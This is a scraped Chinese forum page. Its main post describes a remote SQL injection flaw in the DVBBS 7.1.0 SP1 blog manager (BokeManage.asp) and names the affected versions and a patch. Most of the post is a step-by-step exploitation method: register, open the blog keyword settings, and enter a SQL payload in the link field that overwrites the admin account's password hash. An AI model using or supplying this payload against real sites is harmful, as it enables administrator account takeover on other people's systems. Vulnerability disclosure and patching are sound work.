设为首页收藏本站

切换到宽版

微赢网络技术论坛»论坛 › 学习网交流平台 › 站长知道 › DVBBS 7.1.0 SP1博客远程注入漏洞(图)

前程无忧官网首页有什么好的平台可以
最新的销售平台互联网营销的平台有哪
制作网页的基本流程网页制作和网页设
【帝国CMS】输出带序号的列表(数字排
网站建设公司三一，中联，极东泵车的
织梦建站织梦网站模版后台怎么更改
云服务官网哪些网站有免费的简历模板
如何建网站要什么条件建网站要用什么
吉林市移动公司电话吉林省退休人员网
设计类毕业论文网站设计与实现毕业论

前程无忧官网首页有什么好的平台可以发布: 有什么好的平台可以发布招人信息的？本地平台，看什么地方的，例如你要招聘一个厨师，在央视打广告没用; 查看详细 2024-01-18

2015-12-31Discuz! X2.5-X3.2安装插件出现“不是正版
2012-04-25CNNIC测试“姓名域名”系统个人注册开放在
2012-04-25Google Drive存储服务功能预览：性能出色
2011-12-25windows服务器详细安全设置

返回列表发新帖

查看: 10271|回复: 1

DVBBS 7.1.0 SP1博客远程注入漏洞(图)

`|楛纞♂ぺ﹖

发表于 2009-12-2 00:56:36 | 显示全部楼层 |阅读模式 IP:江苏扬州

漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
补丁下载:点击下载
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填

再编辑关健字

上面几个还是随便填写。。
在第三个，也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--

回复

使用道具举报

返回列表发新帖

|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-10-1 05:34 , Processed in 0.195831 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表